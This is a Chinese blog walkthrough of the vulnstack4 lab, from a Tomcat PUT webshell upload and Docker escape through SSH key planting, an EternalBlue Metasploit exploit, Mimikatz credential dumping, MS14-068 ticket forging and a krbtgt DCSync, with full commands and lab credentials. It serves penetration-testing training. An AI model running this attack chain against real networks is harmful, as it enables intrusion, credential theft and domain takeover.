vulnstack4

已于 2024-02-23 18:07:05 修改
阅读量1.2k 收藏 32
点赞数 35
文章标签: 网络
于 2024-02-23 18:05:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70782241/article/details/136259268
版权
本文详细描述了外网通过网络扫描发现服务器漏洞,特别是针对tomcat服务的任意文件上传漏洞,以及如何利用docker逃逸和内网渗透技巧,包括SSH密钥获取、ms17_010漏洞利用和内网信息收集。作者还分享了如何在内网环境中使用工具如proxifier和Msfconsole进行攻击和权限提升。
摘要由CSDN通过智能技术生成

一、外网打点

1.nmap扫描web服务器发现开启了 22、2001、2002、2003

浏览器挨个打开后发现 2001端口为struct2,2002端口为tomcat/8.5.19,2003为phpmyadmin三个docker服务均有漏洞,这里只介绍能够docker逃逸的tomcat服务

2.tomcat/8.5.19任意文件上传漏洞利用

在此页面刷新并开启bp抓包,抓包后修改GET为PUT传参并传入jsp木马 具体如下图 

注意jsp后面加 /绕过!!

之后蚁剑连接

http://192.168.96.132:2002/ant.jsp
pwd:123

二、内网渗透

1.docker逃逸

Docker逃逸手段有很多:

内核漏洞:由于docker容器与物理机共享一个内核,当该内核存在内核漏洞时,在docker容器内利用内核漏洞可能直接获取物理机权限。

DockerAPI未授权访问漏洞:当物理机的docker api开启并同意未授权访问时,在Docker容器内可使用Docker API新建一个Docker容器,并将物理机的根目录挂载到新Docker容器的某目录下。

Docker容器以特权模式启动:当docker容器是以特权模式启动启动时,可以使用mount命令将物理机的根目录挂载到当前Docker容器的某目录下

在docker容器中可以通过使用cdk进行不安全配置扫描,利用蚁剑进行文件上传

给予执行权限后依次执行如下命令

chmod +x cdk_linux_amd64
授权
./cdk_linux_amd64 evaluate --full
检查漏洞
./cdk_linux_amd64 mount-disk
目录挂载

效果如下

成功挂在目录 /tmp/cdk_KD1pm

2.由于此服务器开启了ssh端口,可以选择写SSH密钥方式获取物理机权限

在kali上执行 

ssh-keygen -t rsa

生成rsa公私钥

将公钥的内容导入到挂载的目录。/tmp/CDK_KD1pm/root/.ssh/authorized_keys 中没有目录及文件的话自己创建即可导入 id_rsa.pub复制粘贴即可

之后利用MobaXterm ssh连接工具 输入私钥连接即可

3.内网信息收集

在本地起一个http服务 传入fscan 扫描即可不多介绍,也可以本地proxifier挂代理socks5后扫描

具体操作在vulnstack3有介绍

扫描结果是有三台主机 192.168.183.128 -130 其中129和130都开启了445端口且有ms17_010漏洞

4.ms17_010漏洞利用

由于kali是192.168.96.129处于不同网段因此web服务器传入Venom进行内网穿透,还是kali启动http服务,然后下载

然后在kali中输入以下命令

./admin_linux_x64 -lport 6666

在web服务器中输入

./agent_linux_x64 -rhost 192.168.96.129 -rport 6666

此时在/etc/proxychains4.conf中 添加 socks5 127.0.0.1 1080即可完成代理

然后启动msfconsole 常规利用依次输入以下命令

use exploit/windows/smb/ms17_010_eternablue
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.183.129 (注意这里填win7的ip win2008打不通不知道为啥)
run

5.由win7获取域控权限并获取hash(猕猴桃、ms14-068 win7靶机有了无需下载传入)

由systeminfo查看漏洞补丁,可知MS14-068(漏洞分析MS14-068漏洞分析 | Hexo)可以利用,win7机上有了漏洞利用的exe了我们查看一下需要的参数(还需要当前域用户的明文密码)

由于永恒之蓝获取的为管理员权限于是要进行降权获得douser的身份并查看userSid

降权就是偷取身份令牌并接管

推出shell后 输入PS查看douser的进程

2428  500   taskhost.exe    x64   1        DEMO\douser              C:\Windows\system32\task
                                                                     host.exe
 2564  880   dwm.exe         x64   1        DEMO\douser              C:\Windows\system32\Dwm.
                                                                     exe
 2576  2556  explorer.exe    x64   1        DEMO\douser              C:\Windows\Explorer.EXE
 2672  2576  vmtoolsd.exe    x64   1        DEMO\douser              C:\Program Files\VMware\
                                                                     VMware Tools\vmtoolsd.ex
                                                                     e

利用steal_token +进程号 即可之后查看UID

明文密码利用 load kiwi里的creds_all模块即可得知明文密码为Dotest123

输入以下命令利用ms14-068获取票据

ms14-068 -u douser@demo.com -p Dotest123  -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130

之后输入rev2self命令返回管理员权限

利用猕猴桃获取域管的权限

命令如下

kerberos::ptc TGT_douser@demo.com.ccache

利用如下命令即可获取hash

lsadump::dcsync /user:krbtgt /domain:demo.com

本文章参考[网络安全/域渗透]内网安全入门靶场 vulnstack4攻略_哔哩哔哩_bilibili

书:内网渗透实战攻略

Sync-1
关注
  • 35
    点赞
  • 32
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Skype安装程序
07-28
最新版Skype即时通讯工具。Skype即时通讯工具是国际上最流行的即时通讯工具,由俄罗斯人创造,现在被美国微软公司收购,已经替代了过去的MSN和ICQ,为当今世界最流行的语音通讯工具
内网渗透之Vulnstack4靶场的全方位打法
最新发布
xf555er的博客
12-29 1607
MS14-068是一个著名的Windows Kerberos安全漏洞,允许攻击者篡改Kerberos票据,从而获取非法提权。这个漏洞特别影响Windows域控制器,能让攻击者伪造Kerberos票据,获取域内几乎任意账户的权限,包括域管理员权限。这使得攻击者可以在网络中随意访问和控制资源。
vulnstack4渗透-外网篇
weixin_51441054的博客
04-20 3091
环境搭建 靶机:ubuntu:ubuntu(web服务器 网卡1:192.168.142.139(模拟外网) 网卡2:192.168.183.130(内网)) 域成员机器:douser:Dotest123(192.168.183.128)win7 DC:administrator:admin123,.(192.168.183.130)windowsserver2008 kali攻击机:192.168.142.134(模拟外网) 先对web靶机进行信息收集 发现一个ssh服...
红日安全ATT&CK靶机实战系列之vulnstack4
黑白的博客
04-25 8680
声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 边下载着,可以开始vmware的网络配置 有两个网段,外网网段是我自己设置的桥接模式192.168.31.1/24,内网网段,vmware加一个网卡VMnet3,192.168.183.1/24 和前面的大同小异,我这里就不细说了看过系列文章的应该都已经很清楚这种网络结构了,我直接贴图吧 桥接的就是攻击机与边界服务器的网卡
靶场复现系列--vulnstack 4
梦之旅行地
12-17 1760
一、前言 也不知道是我运气差还是怎么回事,用vmw搭靶场就是搭不起来,遇到各种问题,后来换成virtual box后解决几个问题就可以了。 第一个问题,虚拟机导入后网卡最好重新配下,不然容易报网卡的错误 第二个问题,启动docker报错,web服务器(ubuntu)用户未加入docker组,将ubuntu用户加入docker组后,重启就可以通过docker构建容器了,下面是加入docker组的命令 sudo gpasswd -a ${USER} docker 二、实践 1.拓扑 备注:这图片直接在靶场
红日靶机vulnstack04【半总结】
qq_45300786的博客
10-06 519
这次环境是3台机器, web服务器:000000 、DC:000000ydc. 、 win7 web服务器改ip有点麻烦,因为需要root用户才能改,给的ubuntu改不了。 所以我就进入高级模式下,修改了root用户的密码 关于虚拟机没有ipIP解决方案 然后再切到root用户修改ip win7 这台机器最麻烦,因为UAC开启最高模式,所以无论执行什么东西,都要输入账号密码 这里我的思路是先用msf的永恒之蓝拿到shell,然后再用下面这个链接去绕过UAC,提权为system权限。然后利用这个sy
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
05-27
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
分布式资产发现与漏洞扫描原理及实现-Silence.pdf
02-25
- 主要经历:Silence自2018年6月加入红日安全研发组,参与了多个安全相关的项目开发与维护,包括DVWA漏洞测试平台分析、WebGoat漏洞测试平台分析、红日CTF比赛平台以及启元学堂和红蓝训练营(vulnstack)。...
靶场vulnstack4内网渗透
weixin_71169068的博客
11-18 1024
靶场vulnstack4内网渗透
一文了解Tomcat/8.5.19文件上传漏洞复现
allintao的博客
03-13 3364
这里返回201是成功的呢,说明我们的绕过成功了,然后这里我们要写相应的JSP木马在请求正文里,那么不会写的怎么办呢,这里可以像我一样用Godzilla一键生成,这里管理点开有个生成,并将有效载荷选择JavaDynamicPayload,点击生成。这里发现后缀为jsp的格式好像是上传不成功,那么我们可以尝试绕过,这里绕过的方式有很多,可以文件流绕过,可以空格绕过,可以"/"绕过,大家可以自己尝试,这里我用"/"绕过。很明显返回的值为201,说明是可行的,那我们直接上传JSP木马可不可以呢?
expat、dbus、zlib、glib、bluez-libs、bluez-utils
07-28
包含expat-2.0.1,dbus-1.4.1,zlib-1.2.5,glib-2.28.6,bluez-libs-3.36,bluez-utils-3.36
ATT&CK实战系列—红队实战-4
Beret-81的博客
04-27 1475
0、靶场介绍 靶场下载、配置参考:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 靶场配置后需要自行开启 vulhub 里面的三个漏洞。 1、信息收集 2、漏洞分析 该阶段为漏洞挖掘、漏洞扫描、漏洞验证 2.1 struts2 漏洞 struts2 漏洞检查工具: https://github.com/HatBoy/Struts2-Scan https://github.com/shack2/Struts2VulsTools https://git
vulnstack域环境靶场(四)
BROTHERYY的博客
12-09 1485
环境搭建 进入Ubuntu的web虚拟机,ubuntu为我们的web环境,其中的web环境需要手动开启,全部为docker环境,需要启动的环境分别为:s2-045、CVE-2017-12615、cve-2018-12613,启动方法如下: sudo su ubuntu docker-compose build docker-compose up 环境全部开启效果如下: 信息搜集 通过nmap发现主机开启以下服务,访问phpmyadmin属于未授权,直接就登录了 ...
Vulnstack内网靶场4
weixin_48888525的博客
11-07 2676
环境 漏洞详情 (qiyuanxuetang.net) 仅主机模式内网网段192.168.183.0/24 外网网段192.168.157.0/24 其中Ubuntu作为对外的内网机器  攻击机kali地址:192.168.157.129  悬剑:192.168.157.130 还需要进入ubuntu开启服务,密码ubuntu cd /home/ubuntu/Desktop/vulhub/struts2/s2-045vsudo docker-compose up -d cd
[渗透测试]Vulnstack 红队(四)
cosmoslin的博客
04-03 523
环境配置 网络拓扑图(仅供参考) 账号信息: web: ubuntu:ubuntu win7: douser:Dotest123 DC: administrator:Test2008 ip信息: 攻击机 IP:192.168.111.5 OS:Kali 靶机 Web IP1:192.168.111.14 IP2:192.168.52.129 OS:Ubuntu DC IP:192.168.183.0/24 OS:Windows Server 2008 PC
红日安全vulnstack-ATT&CK实战系列 红队实战(四)
遇事不决冲冲冲
03-29 8491
一.介绍 下载地址http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ st漏洞利用phpmyadmin getshell、tomcat 漏洞利用、docker逃逸、ms14-068、ssh密钥利用、流量转发、历史命令信息泄露、 域渗透 机器密码 web: ubuntu:ubuntu win7: douser:Dotest123 DC: administrator:Test2008 二.环境搭建 下载完成后为三个压缩包,解压后如图 在每个文件夹中创建
渗透靶场--vulnstack-红队评估实战(4)
weixin_45794666的博客
07-20 751
vulnstack-红队评估实战(4) 环境配置 web服务器 ubuntu:ubuntu 内网192.168.183.131 外网192.168.154.137 web服务需要自己启动分别为s2-045、CVE-2017-12615、cve-2018-12613 sudo su ubuntu cd /home/ubuntu/Desktop/vulhub/struts2/s2-045 docker-compose up 域成员机器 douser:Dotest123 192.168.183.128 域控
vulstack红队评估(四)
PANDA墨森的博客
06-21 1697
原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13118210.html 一、环境搭建: ①根据作者公开的靶机信息整理 虚拟机密码: ubuntu: ubuntu:ubuntu win7: douser:Dotest123 Win2008 DC: administrator:Test2008,因为登陆要修改密码,所以改为了panda666... ②虚拟机网卡设置 ubuntu双网卡模拟内外网: 外网:192.168.1....
vulnstack红日-4
paidx0
07-11 319
vulnstack红日-4
红日靶场VulnStack1
10-08
对于红日靶场VulnStack1,我了解到它是一个虚拟机中的漏洞靶场。这个靶场主要用于学习和实践网络安全方面的知识,其中包含了一些常见的漏洞,供用户进行渗透测试和漏洞攻击的实战练习。 由于我是一个AI模型,并没有...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值